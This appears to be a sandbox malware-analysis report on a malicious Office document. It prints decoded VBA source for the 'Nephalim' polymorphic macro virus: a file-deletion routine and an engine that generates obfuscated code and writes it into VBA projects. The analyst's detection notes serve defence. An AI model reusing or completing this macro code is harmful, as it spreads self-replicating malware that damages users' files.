MALICIOUS
362
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The sample contains VBA macros, including Document_Open and Workbook_Open, which execute automatically when the document or workbook is opened. Critical heuristics indicate the use of Shell() and CreateObject(), suggesting the execution of arbitrary code. The embedded URL 'http://www.bo2k.com/warez/bo2k_1.0.exe' likely points to a secondary payload. ClamAV detections further confirm the malicious nature of both the file and its extracted artifact.
Heuristics 8
-
ClamAV: Win.Trojan.Psycho-3 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected — medium — 5 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
Shell() call in VBA — critical — OLE_VBA_SHELL: Shell() call in VBA
-
Document_Open macro — high — OLE_VBA_DOCOPEN: Document_Open macro
-
Workbook_Open macro — high — OLE_VBA_WBOPEN: Workbook_Open macro
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call
-
GetObject call — high — OLE_VBA_GETOBJ: GetObject call
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
- http://www.nephilim.com/ — In document text (OLE body)
- http://www.bo2k.com/warez/bo2k_1.0.exe — In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 72056 bytes |

SHA-256: c24d9609751039f5a8652adda3b229fb0e60f9b26e5e1cf1291fa4dd6ba79520

Detection — ClamAV: Win.Trojan.W-420

Obfuscation or payload: unlikely
Preview script — First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Analyst notes (added during review of the extracted macro):
' - VB_Name "ThisDocument" / VB_Base "1Normal.ThisDocument": this is the
'   document's own code module, derived from the Normal template
'   (VB_TemplateDerived = True), which is where Document_Open-style
'   auto-exec handlers live.
' - Further down, fExposedEngine builds strings such as
'   "<obj>.VBProject.VBComponents.Item(<n>).CodeModule." — i.e. the macro
'   generates VBA source and addresses the VBA project object model, which
'   is what makes it a self-modifying (polymorphic) macro engine. Programmatic
'   access to VBProject requires the Office "Trust access to the VBA project
'   object model" setting; leaving that setting disabled is a cheap hardening
'   control, and VBProject/CodeModule strings in macros are a detection
'   indicator not covered by the heuristics listed in this report.
' Nephalim v0.93 -- Pre-release version.
'
' Known issues in this release:
' -Instability on Excel platform
'
' Deletes the file at sFileName, if it exists, after resetting its attributes.
' Behaviour as written:
'   - On Error Resume Next suppresses every runtime error, so a failed
'     SetAttr or Kill is silent and the caller gets no signal.
'   - SetAttr sFileName, 0 resets the file to normal attributes (0 = vbNormal),
'     clearing read-only/hidden/system bits so that Kill is not blocked by them.
'   - Kill removes the file.
' Detection note: a SetAttr/Kill pair inside an auto-executing macro is a
' file-tampering indicator; none of the heuristics listed in this report
' flags it, so it is a candidate for an additional rule.
Private Sub fDeleteFile(sFileName As String)
On Error Resume Next
If Dir(sFileName) <> "" Then   ' act only when the path currently exists
SetAttr sFileName, 0           ' 0 = vbNormal: strip read-only/hidden/system
Kill sFileName                 ' delete the file; errors are swallowed above
End If
End Sub
' Returns a pseudo-random string. In fExposedEngine it is used as filler text
' for generated "Rem" comment lines; the sKey parameter that fExposedEngine
' receives presumably comes from here as well, but that caller is not in view.
'   Length:     Int((30 * Rnd) + 6)          -> 6..35 characters
'   Characters: Chr(Int((122 - 65) * Rnd) + 65) -> codes 65..121, i.e. "A".."y",
'               including the six punctuation codes between "Z" and "a".
' Rnd is not seeded in this function; whether the output differs between runs
' depends on the caller having called Randomize (fExposedEngine does).
' Detection note: variable-length random identifiers/comments of this kind are
' what defeat simple byte-pattern signatures on the generated code, so
' detection should key on the generator (this module) rather than its output.
Private Function CreateKey()
On Error Resume Next
Dim iTemp As Integer, sKey As String
sKey = ""    ' built up one character per loop iteration below
For iTemp = 1 To Int((30 * Rnd) + 6): sKey = sKey + Chr(Int((122 - 65) * Rnd) + 65): Next iTemp
CreateKey = sKey
End Function
Private Function fExposedEngine(sTargetApp As String, sKey As String, iLineCount As Integer)
On Error Resume Next
Dim var(20) As String, eol(20) As String, bond(20) As String, proc_declare(20) As String
Dim sEngine1 As String, sEngine2 As String, sEngine3 As String
Randomize
sTemp = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"
For iTemp = 1 To 20
poz = Int(Rnd * Len(sTemp)) + 1
var(iTemp) = Mid(sTemp, poz, 1)
sTemp = Left(sTemp, poz - 1) + Right(sTemp, Len(sTemp) - poz)
Select Case Int((4 * Rnd) + 1)
Case 1: bond(iTemp) = ": "
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
Case 2: bond(iTemp) = vbLf
eol(iTemp) = vbLf
proc_declare(iTemp) = "Private "
Case 3: bond(iTemp) = vbLf & vbLf
eol(iTemp) = vbLf & vbLf
proc_declare(iTemp) = "Public "
Case 4: bond(iTemp) = ": Rem " & CreateKey & vbLf
eol(iTemp) = vbLf & vbLf & vbLf
proc_declare(iTemp) = ""
End Select
Next iTemp
iSplitNumber1 = 130
iSplitNumber1A = Int(Rnd * iSplitNumber1)
iSplitNumber1B = iSplitNumber1 - iSplitNumber1A
iSplitNumber2 = 32
iSplitNumber2A = Int(Rnd * iSplitNumber2)
iSplitNumber2B = iSplitNumber2 - iSplitNumber2A
iSplitNumber3 = iLineCount
iSplitNumber3A = Int(Rnd * iSplitNumber3)
iSplitNumber3B = iSplitNumber3 - iSplitNumber3A
sObject = var(9) & ".VBProject.VBComponents.Item(" & var(16) & ").CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject1A = "set " & var(10) & " = " & sOne
sSplitObject1B = var(10) & sTwo
sObject = "VBProject.VBComponents.Item(1).CodeModule."
iTemp = Int(Rnd * Len(sObject)) + 1
poz = InStr(iTemp, sObject, ".")
sOne = Left(sObject, poz - 1)
sTwo = Right(sObject, Len(sObject) - poz + 1)
sSplitObject2A = "set " & var(13) & " = " & sOne
sSplitObject2B = var(13) & sTwo
sEngine1 = _
"Private Sub " & var(14) & "()" & bond(1) & _
"On Error Resume Next" & bond(2)
Select Case sTargetApp
Case "Excel": sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Excel.Workbook" & bond(3) & _
"Set " & var(9) & " = Excel.Workbooks.Add" & bond(4) & _
var(16) & " = 4" & bond(5)
Case "Word": sEngine1 = sEngine1 & _
"Dim " & var(9) & " As Word.Document" & bond(3) & _
"Set " & var(9) & " = Word.Documents.Add" & bond(4) & _
var(16) & " = 1" & bond(5)
End Select
sEngine1 = sEngine1 & _
sSplitObject1A & bond(6) & _
sSplitObject2A & bond(7) & _
var(11) & " = (" & iSplitNumber1A & "+" & iSplitNumber1B & ")" & bond(8) & _
var(12) & " = (" & iSplitNumber2A & "+" & iSplitNumber2B & ")" & bond(9) & _
"For " & var(1) & " = 1 To " & iSplitNumber3A & "+" & iSplitNumber3B & eol(10) & _
var(5) & " = " & sSplitObject2B & "lines(" & var(1) & ", 1)" & bond(11) & _
var(5) & " = right(" & var(5) & ",len(" & var(5) & ")-1)" & bond(12) & _
var(4) & " = """"" & bond(13) & _
var(3) & " = 0" & bond(14) & _
"For " & var(2) & " = 1 To Len(" & var(5) & ")" & eol(15) & _
var(3) & " = " & var(3) & " + 1" & eol(16) & _
"If " & var(3) & " > " & Len(sKey) & "Then " & var(3) & " = 1" & eol(1) & _
var(6) & " = Asc(Mid(" & var(5) & ", " & var(2) & ", 1))" & eol(17) & _
"If " & var(6) & " >= " & var(12) & " And " & var(6) & " <= " & var(11) & " Then" & eol(18)
sEngine2 = _
var(8) & " = Asc(Mid(""" & sKey & """, " & var(3) & ", 1))" & bond(19)
sEngine3 = _
"If " & var(8) & " >
... (truncated)